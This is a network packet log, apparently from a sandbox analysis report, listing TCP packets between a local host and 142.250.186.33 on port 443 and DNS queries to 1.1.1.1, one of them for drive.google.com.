                                              Sep 30, 2024 09:58:05.693131924 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.712512970 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.712616920 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.712625027 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.712657928 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.712708950 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.712708950 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.712719917 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.712780952 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.712842941 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.712891102 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.712897062 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.712943077 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.713397980 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.713457108 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.717092037 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.717147112 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.717154026 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.717209101 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.717215061 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.717304945 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.722419024 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.722484112 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.722498894 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.722558975 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.727709055 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.727765083 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.727771997 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.727827072 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.732991934 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.733082056 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.733088970 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.733165026 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.738043070 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.738167048 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.738179922 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.738229036 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.743227959 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.743328094 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.743336916 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.743403912 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.749891043 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.751250029 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.751265049 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.751408100 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.758109093 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.759412050 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.759421110 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.759490013 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.764826059 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.764941931 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.764950991 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.765192032 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.768855095 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.769243956 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.769253016 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.769738913 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.771430969 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.771537066 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.771544933 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.771614075 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.776535034 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.776633024 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.776644945 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.776685953 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.780145884 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.780211926 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.780250072 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.780250072 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.780258894 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.780359030 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.784393072 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.784518003 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.784528971 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.784652948 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.789457083 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.789515018 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.789530993 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.789658070 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.793256044 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.793438911 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.793453932 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.793556929 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.797364950 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.797425032 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.797446966 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.797509909 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.799315929 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.799401999 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.799408913 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.799453020 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.800685883 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.800837040 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.800843954 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.801026106 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.801959991 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.802047968 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.802083015 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.802179098 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.804150105 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.804281950 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.804289103 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.804419994 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.806726933 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.806880951 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.806890965 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.806991100 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.808696985 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.808767080 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.808774948 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.808836937 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.810971022 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.811098099 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.811105013 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.811244011 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.813586950 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.813668966 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.813676119 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.814007044 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.815222025 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.815284967 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.815290928 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.815402985 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.817204952 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.817296982 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.817303896 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.817465067 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.819423914 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.819540024 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.819644928 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.819724083 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.822254896 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.822304010 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.822314978 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.822364092 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.825014114 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.825068951 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.825076103 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.825207949 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.827614069 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.827724934 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.827730894 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.827838898 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.828298092 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.828433037 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.828438997 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.828542948 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.830382109 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.830679893 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.830688000 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.830745935 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.832880020 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.833045006 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.833050966 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.833170891 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.834491968 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.834558010 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.834602118 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.834656000 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.836678982 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.836736917 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.838135958 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.838423967 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.838689089 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.838731050 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.838809013 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.838850975 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.840930939 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.841036081 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.846493006 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.846544981 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.846554041 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.846662045 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.846668005 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.846831083 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.853295088 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.853365898 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.853373051 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.853416920 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.853420019 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.853431940 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.853456020 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.853595018 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.857285976 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.857341051 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.857342005 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.857352972 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.857409954 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.857409954 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.857419968 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.857467890 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.859882116 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.859941006 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.859997988 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.859997988 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.860006094 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.860094070 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.864813089 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.864927053 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.865016937 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.865061045 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.865087032 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.865096092 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.865112066 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.865238905 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.868539095 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.868586063 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.868621111 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.868621111 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.868630886 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.868866920 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.868874073 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.868927002 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.872739077 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.872796059 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.872870922 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.872912884 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.872941017 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.872947931 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.872982979 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.872982979 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.877849102 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.877895117 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.877944946 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.877944946 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.877954006 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:05.877994061 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:05.879389048 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.015790939 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.015818119 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.015928030 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.015935898 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.016012907 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.023660898 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.023814917 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.023849010 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.023967028 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.023974895 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.024044037 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.024049997 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.024115086 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.024123907 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.024147987 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.024190903 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.024209023 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.037408113 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.037523031 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.037631989 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.037708998 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.037852049 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.037911892 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.038016081 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.038073063 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.038100958 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.038147926 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.038182020 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.038249016 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.042815924 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.042902946 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.042917013 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.042983055 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.043185949 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.043255091 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.043275118 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.043344975 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.043417931 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.043487072 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.043504953 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.043581963 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.050730944 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.050873041 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.050885916 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.050990105 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.051017046 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.051024914 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.051081896 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.051081896 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.051090002 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.051201105 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.051208019 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.051259995 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.051728010 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.051831007 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.051847935 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.051914930 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.051937103 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.052071095 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.052098036 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.052104950 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.052140951 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.052141905 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.052154064 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.052262068 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.054981947 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.055064917 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.055088997 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.055156946 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.055167913 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.055248976 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.055254936 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.055314064 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.055320024 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.055414915 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.055421114 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.055495024 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.067857027 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.067914009 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.067924976 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.067934990 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.068120956 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.068183899 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.068183899 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.068192959 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.068435907 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.068439960 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.068542004 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.072592020 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.072643995 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.072654963 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.072712898 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.072758913 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.072758913 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.072762966 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.072849989 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.072849989 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.072856903 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.072866917 CEST44349734142.250.186.33192.168.2.5
                                              Sep 30, 2024 09:58:06.072916031 CEST49734443192.168.2.5142.250.186.33
                                              Sep 30, 2024 09:58:06.072916031 CEST49734443192.168.2.5142.250.186.33
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 30, 2024 09:57:20.800240993 CEST | 56142 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 09:57:20.808336020 CEST | 53 | 56142 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 09:57:21.865652084 CEST | 57313 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 09:57:21.873478889 CEST | 53 | 57313 | 1.1.1.1 | 192.168.2.5
Sep 30, 2024 09:58:00.660109043 CEST | 63695 | 53 | 192.168.2.5 | 1.1.1.1
Sep 30, 2024 09:58:00.666986942 CEST | 53 | 63695 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 30, 2024 09:57:20.800240993 CEST | 192.168.2.5 | 1.1.1.1 | 0xb85b | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
